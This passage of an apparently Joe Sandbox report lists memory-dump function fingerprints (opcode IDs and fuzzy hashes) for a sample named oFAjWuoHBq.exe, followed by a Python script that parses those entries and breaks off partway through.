                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e524272fefbca2e63fdf437e3bf142e8fe3483ba5afba8802df8c236e2699e8
                  • Instruction ID: 63602344deb038ed959495f6def14b8788424b49c6861e8738684b8a15a11e0d
                  • Opcode Fuzzy Hash: 8e524272fefbca2e63fdf437e3bf142e8fe3483ba5afba8802df8c236e2699e8
                  • Instruction Fuzzy Hash: 3661D33180E68A9FE795BB3898552FA7FA0EF06364F0405BBD44CC60D3EF2869488759
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f1480b38406281ecd50ba78c018dc7a1280b34279bb6a5d2a9413e1de2e651e5
                  • Instruction ID: d8bf8e2fab348b733604670c4df1428f719b1d742201ca08b40b730138324822
                  • Opcode Fuzzy Hash: f1480b38406281ecd50ba78c018dc7a1280b34279bb6a5d2a9413e1de2e651e5
                  • Instruction Fuzzy Hash: 50515B3090D68E8FDB95EB2888586EA7BB0FF56340F0505BBD818C7192EB38A544CB55
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44c98c6adafee230f08cef4a1833b40c8dc48f1caa0bd717289a53d68ff253bd
                  • Instruction ID: 15235415060268581e5d921edc88ab8e33e2806b74ed3a3555cab18cd8c2bb00
                  • Opcode Fuzzy Hash: 44c98c6adafee230f08cef4a1833b40c8dc48f1caa0bd717289a53d68ff253bd
                  • Instruction Fuzzy Hash: 5251883091D64E8FEB95EB28C4586E9BBF0FF1A340F0444BAD409E3191EB38A544CB55
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9522501d98ad8d136102fc7c7f6cae43e51c1fe3e3c8a0f617fac0fd41f4802e
                  • Instruction ID: 3eb2968240480e8d1e19775ac53cc9d9c2a95b963c2ad9cd82c64edd76f94a1e
                  • Opcode Fuzzy Hash: 9522501d98ad8d136102fc7c7f6cae43e51c1fe3e3c8a0f617fac0fd41f4802e
                  • Instruction Fuzzy Hash: 2851C330D4E28A8FE752ABB488182FA7BF0EF17345F0445BAD408D61D2FB78A548C765
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43537043d54d52b3c8354fac223026047e4541cab80ba614c8c0a613e209ecda
                  • Instruction ID: 9473f346e7d683f03e6d8e3053de18756dbe767c169dc7a6c6f2276116c7f290
                  • Opcode Fuzzy Hash: 43537043d54d52b3c8354fac223026047e4541cab80ba614c8c0a613e209ecda
                  • Instruction Fuzzy Hash: ED519E3090D68E8FEB56EB7488586B97BE0FF1A341F1544BBD809C70E2EB38A544C721
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8560193c16d6024b45b5f7aaa0300d716e562fb0738417639a770dd979a43efc
                  • Instruction ID: 85283e6aee1eb9bb4070dc750075275facf109a9a36886ba1b3c4887a2a9bca2
                  • Opcode Fuzzy Hash: 8560193c16d6024b45b5f7aaa0300d716e562fb0738417639a770dd979a43efc
                  • Instruction Fuzzy Hash: CF519E30D1D64E8FE756AB7888592FA7BA0EF4A341F44057AD408D61D2FB38A548C715
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 196275804faa028fd225a5c5885e5ba80575817fd1ecfa5af70a611892bb7da5
                  • Instruction ID: 2d66ddca38d940616998f5d5fe238d0205b465ed2d75723058016e95e265f21e
                  • Opcode Fuzzy Hash: 196275804faa028fd225a5c5885e5ba80575817fd1ecfa5af70a611892bb7da5
                  • Instruction Fuzzy Hash: 82417F3085D78A8FEB56AF7488182A93FE0FF16341F4544BBD848C61D3EB38A558C721
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c61b7d94d9d57922e611e6b6be76ba9a2ba016974deff63dda718e3ee9e6f1a3
                  • Instruction ID: b13040078c5555225270c63375cad4b32d63ced2af17ff49106022a1cdad8010
                  • Opcode Fuzzy Hash: c61b7d94d9d57922e611e6b6be76ba9a2ba016974deff63dda718e3ee9e6f1a3
                  • Instruction Fuzzy Hash: A741AC30C1E64E8FEB52AB68C8592FE7BB0EF4A341F44057AD408D61D2EF38A548C725
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 056c63c7da17c11e627527e6d40b472add2906a53058d62b459f6ee31b4da3dc
                  • Instruction ID: 5f433cb0fff627d1eb5e79e2359a316579e0814cd99aa21c353573e87f3e3d4a
                  • Opcode Fuzzy Hash: 056c63c7da17c11e627527e6d40b472add2906a53058d62b459f6ee31b4da3dc
                  • Instruction Fuzzy Hash: E431AE70D0DA8E8FEB58EF68C8196FA7BE0FF5A350F04017AD409D71D2EB24A8848751
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 474fecfaa31d448d2247ab7afb2790c2b226f3a25ee663038af1e17b169d9cd2
                  • Instruction ID: fe4622e358da98e8179db92b9dca97314dfea6d5d6fe99fcc4354b71d8691810
                  • Opcode Fuzzy Hash: 474fecfaa31d448d2247ab7afb2790c2b226f3a25ee663038af1e17b169d9cd2
                  • Instruction Fuzzy Hash: 1831E4B1D0DA8A9FE741FB3858581E97BE0FF56352F0804BBC008CB1D2FB2858868755
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d76c4a2b105e808ec2e9a6b4f82637a400b6af8d467e86e9cb23ba7d5df49f95
                  • Instruction ID: fb9f75cfa3471149ba057fdbe551b0db0982577acf606fde32fd1db031f6a59d
                  • Opcode Fuzzy Hash: d76c4a2b105e808ec2e9a6b4f82637a400b6af8d467e86e9cb23ba7d5df49f95
                  • Instruction Fuzzy Hash: A231D63290D2565FE742FBB8E8945EA3BB0EF46365F0942B7D048CA093EB3C90458765
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2920793cfc409b2c3ec15b10a5e6db0c234e191934270c160ede3f304e7a97df
                  • Instruction ID: 6c89f7c7795b7e9a98cd20c2bcbda981c19347b9b6b7c6703163b54d3efba874
                  • Opcode Fuzzy Hash: 2920793cfc409b2c3ec15b10a5e6db0c234e191934270c160ede3f304e7a97df
                  • Instruction Fuzzy Hash: F931D335E1C91D9EEB94EB989895AFCB7B1FF6A340F501139D00DE3282EF2468429B44
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 43cd2bff448021a08d678a9a3266b97fd550410bb1c4cfbb38b0cb0d9a7075ec
                  • Instruction ID: 264a90953a3ab402d52f7b1ca6f79c36fb6eb58e65818b6d0537e9fd4faaee9e
                  • Opcode Fuzzy Hash: 43cd2bff448021a08d678a9a3266b97fd550410bb1c4cfbb38b0cb0d9a7075ec
                  • Instruction Fuzzy Hash: 6031953485D78E8FD75AAF7488182B93BE0FF16341F5404BBE809C61D2EB38A558D751
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d25a9efc42f5b859ec681b81aff35f9c835de337aaaefde892b881c398e8ece4
                  • Instruction ID: 5fa6f63fff5ac83684babbee18f68c4bd69e48213f75c83fe48bf356d1a319cc
                  • Opcode Fuzzy Hash: d25a9efc42f5b859ec681b81aff35f9c835de337aaaefde892b881c398e8ece4
                  • Instruction Fuzzy Hash: 91318130D0E24A8EEB12EBA888143FE7BE0EF16395F144475D405E61C2EB79A548CB65
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2597fb035df9dd5a64d13f7b34378b70a010517b594246ad9007be321a662738
                  • Instruction ID: 9c221b62a910ed93b3ed5692a60827afac8dda521922da0208188d8d77122261
                  • Opcode Fuzzy Hash: 2597fb035df9dd5a64d13f7b34378b70a010517b594246ad9007be321a662738
                  • Instruction Fuzzy Hash: 9A21F830E1D91D8FDB94FBA89895AECB7B1FF5A340F50112AC00DE7282EF2568419744
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8659fa0e1aadfc7afefa08b69eabe33979056ade16c2d0532c864f2ae7903d3e
                  • Instruction ID: 7687e243ddca70d34e6f817b52dc462e51ed5aa69b3fbdf34061f6cb2001b6c2
                  • Opcode Fuzzy Hash: 8659fa0e1aadfc7afefa08b69eabe33979056ade16c2d0532c864f2ae7903d3e
                  • Instruction Fuzzy Hash: 7E313B3090E64E8EEB55AB6488552FE7BE0EF16341F0005BAD419D32D2EB789944CB95
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 994ab06656af2f86369d5903d1840f03009262dfb9d3b1143b742f4755290e6b
                  • Instruction ID: cddbc467c259d853e33e10c3457d83ff717eda5b83a48fb2fefeeb9217f9ce37
                  • Opcode Fuzzy Hash: 994ab06656af2f86369d5903d1840f03009262dfb9d3b1143b742f4755290e6b
                  • Instruction Fuzzy Hash: 0B31F570D1952E9EEB94EF94C8847ECB6F1FF59340F1041BAD00DE2291EB7869848B58
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41fef2f6f97f8e30d0aa9d463c34c29e8757d783863c2b4b8f2b456177d6c55d
                  • Instruction ID: 00b8751a005fb34dffedf7b1dd06272f1fe49e248467efaad6cc7c9d9f6ab3c9
                  • Opcode Fuzzy Hash: 41fef2f6f97f8e30d0aa9d463c34c29e8757d783863c2b4b8f2b456177d6c55d
                  • Instruction Fuzzy Hash: 37310470D0C5298EEBA5EB54C8557FDB2B0AF56340F4040BAD44DA62D2EF782A88CF18
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ceb4ae7531b74af998b82191647614b331192d110645d790d56e4d5473b421d4
                  • Instruction ID: 3e3e6f2e7fbcca3a1b4b27e0ae501c07d0e4ab96275e823dcb7b0ffb81a9966e
                  • Opcode Fuzzy Hash: ceb4ae7531b74af998b82191647614b331192d110645d790d56e4d5473b421d4
                  • Instruction Fuzzy Hash: 49115830D0D54E9EE780FB68C8496BA7BA0FF9A385F4005B6D809D61D2EF38A5448754
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1ac0d66c39e5e6d94d7879788bddc46919c3f6aac8b9fc2aacd4f74ab40ced6d
                  • Instruction ID: be57a86e1dc64056694f98611b4d4a7602135edcb601f0249251499ebeff3099
                  • Opcode Fuzzy Hash: 1ac0d66c39e5e6d94d7879788bddc46919c3f6aac8b9fc2aacd4f74ab40ced6d
                  • Instruction Fuzzy Hash: 5C11813485D78E8FEB5AAB7484181F93BA0FF46241F50047BE809C20D1EB385558C751
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0c2b64f230bde72b12f13471626cb3e1940daeb8b775f07cf2c7425c8f261356
                  • Instruction ID: ab96e36443e6ab90f9389bfa601eb3125c12d35887d6bf4f2b61a97cc02e0a65
                  • Opcode Fuzzy Hash: 0c2b64f230bde72b12f13471626cb3e1940daeb8b775f07cf2c7425c8f261356
                  • Instruction Fuzzy Hash: D611CE3080EA4E8FDB59EF2484696B97BE1FF1A340F1044BEE409C30D2EB35A585C744
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3671992d9550e08b733661e1427462f0de4042cb1099b513d42a3c31c00f4f65
                  • Instruction ID: 303d5ff18be70b7a5b4559acc9137ee710e5ea8ac8b00e6e45e87bf536e3e14a
                  • Opcode Fuzzy Hash: 3671992d9550e08b733661e1427462f0de4042cb1099b513d42a3c31c00f4f65
                  • Instruction Fuzzy Hash: 87118C3485E78E9FEB5AAB7484082BA77E4FF06345F50087BE819C20D2EF38A558D751
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 07b8d5ad4392c31e35c699956fdc256ba516388da0e9d1e9194d159c1f3ae1cc
                  • Instruction ID: a0c9744ecd5069123d6d8ec6de17fed80a2247186818a7ec96cc17896db5280c
                  • Opcode Fuzzy Hash: 07b8d5ad4392c31e35c699956fdc256ba516388da0e9d1e9194d159c1f3ae1cc
                  • Instruction Fuzzy Hash: 4D118F3090E68D4FEB45EB6488692BA7BF0FF1A301F1004BBD409C70D2EB346585C705
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction ID: e22e982972602e29607d5bfc399560a8d7e76e9f9bdf249856d777e4ec8590ac
                  • Opcode Fuzzy Hash: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction Fuzzy Hash: 6311C570D1850ACFDB54EF94D484AEDB7F2EF59350F20452AE419A62D1EB3868908B44
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b9f1e1d1e8832e0574aab6dd43930e0d5f0219f8477ae549b9d21637ddf49bb0
                  • Instruction ID: e99e19425bc0ff51f0fac5202762d57bdb14ed371c897cbd83fcbd3410f38aae
                  • Opcode Fuzzy Hash: b9f1e1d1e8832e0574aab6dd43930e0d5f0219f8477ae549b9d21637ddf49bb0
                  • Instruction Fuzzy Hash: C101AD3481860E9EEB4AEB6484086BA77E0FF19345F20047FD80EC21D1EF35A594C720
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction ID: d8232beb7212df2157eb4c5f4da9b388c77737c7f385db8797068b7092e3edd4
                  • Opcode Fuzzy Hash: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction Fuzzy Hash: AF019070D1C10ACFDB18EF94D490AFDB7F2EF59350F20452AE409A22D1EB386990CB98
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c8c4934b52414eddc808ee5256e867a16234724ee57fc9c836f1f3fd15280186
                  • Instruction ID: 33256775404b84db2e883b8676ced20b3bd58444c08324abab794ddda04f3a25
                  • Opcode Fuzzy Hash: c8c4934b52414eddc808ee5256e867a16234724ee57fc9c836f1f3fd15280186
                  • Instruction Fuzzy Hash: 50F03A30A0A4198FEB50EB14C884BEEB7B1EB94345F1042A5C409A3285DE396E848B88
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4c539568c11bee4f2b750d98eafb16e1b332a74ccc819912ebd87da1ebc4a976
                  • Instruction ID: e1dce635e0ff675f26569e857a6d6314a1830cb0c5a64790cf607449c2b3dbb6
                  • Opcode Fuzzy Hash: 4c539568c11bee4f2b750d98eafb16e1b332a74ccc819912ebd87da1ebc4a976
                  • Instruction Fuzzy Hash: 51F0AC30908519CFEB95FB00CC54BE973A1FB95354F5085A9C44ED71A1EE7869888B58
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: 1e8b819e1b67b06311d0fb9531a27febb5c6c575d713ff5af183dc8a3f160afb
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: 59E0C9B0E1C91ECEEBA5EB0489407A8B6B1BB56344F2040F9820DE61D0EB342AC18F08
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6135594a851a3d67b619c4c53d5e1d354b2e28bfb64a927bbc2f8d9f247ab74f
                  • Instruction ID: 07ada39ead5ff49ba8d57093d6e70542f6bdd2f4b496fdd8ad36e00915415d0c
                  • Opcode Fuzzy Hash: 6135594a851a3d67b619c4c53d5e1d354b2e28bfb64a927bbc2f8d9f247ab74f
                  • Instruction Fuzzy Hash: 8ED04235A1892DCFDF50EB98D8815EDB3B4FB59351F400126D51DD7181DB6468118B40
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction ID: 02c7bc0c740cf215f214ec4969050d6716b034dac867b05d63e302419e9e293c
                  • Opcode Fuzzy Hash: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction Fuzzy Hash: 4EE04CB0D1C91D8EDBA5EB048950BA8B7B1FB55344F1081F9820DE7280EB346AC19F18
                  Memory Dump Source
                  • Source File: 00000000.00000002.2057348323.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff848f00000_oFAjWuoHBq.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae5d643b848a4cbb81e5bc234193d09b5f8dc4c79009b84118a098f8e116a996
                  • Instruction ID: 123f6acb6abf350440dcae412acc1cf77642d3e74ceff8f09b81d3d0627fb352
                  • Opcode Fuzzy Hash: ae5d643b848a4cbb81e5bc234193d09b5f8dc4c79009b84118a098f8e116a996
                  • Instruction Fuzzy Hash: FDB18B3090D65E8FEB99EF64C8596BA7BE1FF99351F0004BAD80AD71D2DB346944CB80
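Every fingerprint in this section comes from one of two memory dumps: process 0 (oFAjWuoHBq.exe) at 00007FF848F00000 and process 17 (tcEcURjxxClvKHXzINDGbUbctpEdgO) at 00007FF848F40000, both marked "based on PE: false". The script below is an added example, not code from the Joe Sandbox report or its IDA plugin. It parses these "Memory Dump Source" entries, cross-checks the dotted .sdmp name against the Offset and the hcaresult_ snapshot name (the page itself shows that 00000011 in the file name is process 17 in the snapshot name), and groups the function fingerprints by dump region. Reading the fifth dotted field as a Windows page protection (0x40 = PAGE_EXECUTE_READWRITE) and the seventh as an allocation type (0x20000 = MEM_PRIVATE) is an assumption; the remaining fields are matched but not interpreted. The sample text is constructed from three of this page's entries with shortened hash values.

```python
# Added example, not code from the Joe Sandbox report or its IDA plugin. Fields marked ASSUMED are
# inferred from the .sdmp naming layout plus winnt.h constants; the report documents none of them.
import re
from dataclasses import dataclass

# winnt.h values. ASSUMED: the 5th dotted field of the name is a page protection, the 7th an allocation type.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

H = r"[0-9A-Fa-f]"
SOURCE_RE = re.compile(
    rf"Source File:\s*(?P<proc>{H}{{8}})\.(?P<phase>{H}{{8}})\.{H}+\.(?P<base>{H}{{16}})\."
    rf"(?P<prot>{H}{{8}})\.{H}{{8}}\.(?P<mtype>{H}{{8}})\.{H}{{8}}\.sdmp,"
    rf"\s*Offset:\s*(?P<offset>{H}+),\s*based on PE:\s*(?P<pe>true|false)")
SNAPSHOT_RE = re.compile(
    rf"Snapshot File:\s*hcaresult_(?P<proc>\d+)_(?P<phase>\d+)_(?P<base>{H}+)_(?P<sample>.+?)\.jbxd")
# [ \t]* rather than \s* so an empty field ("• String ID:") does not swallow the following line.
FIELD_RE = re.compile(r"•\s*(?P<key>[^:\n]+):[ \t]*(?P<val>.*)")

@dataclass
class Entry:
    proc: int          # hex in the .sdmp name (0x11), decimal in the hcaresult_ name (17)
    phase: int         # 2 for every entry on this page
    base: int          # region base; must equal the 'Offset:' value on the same line
    protect: int       # ASSUMED page protection
    mem_type: int      # ASSUMED allocation type
    pe_backed: bool    # 'based on PE'
    snap: tuple        # (proc, phase, base) taken from the hcaresult_ snapshot name
    sample: str
    opcode_id: str
    string_id: str     # empty when the function references no string

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))
    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))
    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # every PAGE_EXECUTE* value sits in bits 4..7
    def consistent(self) -> bool:
        return (self.proc, self.phase, self.base) == self.snap

def parse_report(text: str) -> list:
    """One Entry per 'Memory Dump Source' block; raises if the file name and Offset disagree."""
    entries = []
    for chunk in re.split(r"^\s*Memory Dump Source\s*$", text, flags=re.M)[1:]:
        src, snap = SOURCE_RE.search(chunk), SNAPSHOT_RE.search(chunk)
        if not (src and snap):
            continue
        base = int(src["base"], 16)
        if base != int(src["offset"], 16):
            raise ValueError(f"file-name base {base:#x} disagrees with Offset {src['offset']}")
        f = {m["key"].strip(): m["val"].strip() for m in FIELD_RE.finditer(chunk)}
        entries.append(Entry(int(src["proc"], 16), int(src["phase"], 16), base, int(src["prot"], 16),
                             int(src["mtype"], 16), src["pe"] == "true",
                             (int(snap["proc"]), int(snap["phase"]), int(snap["base"], 16)),
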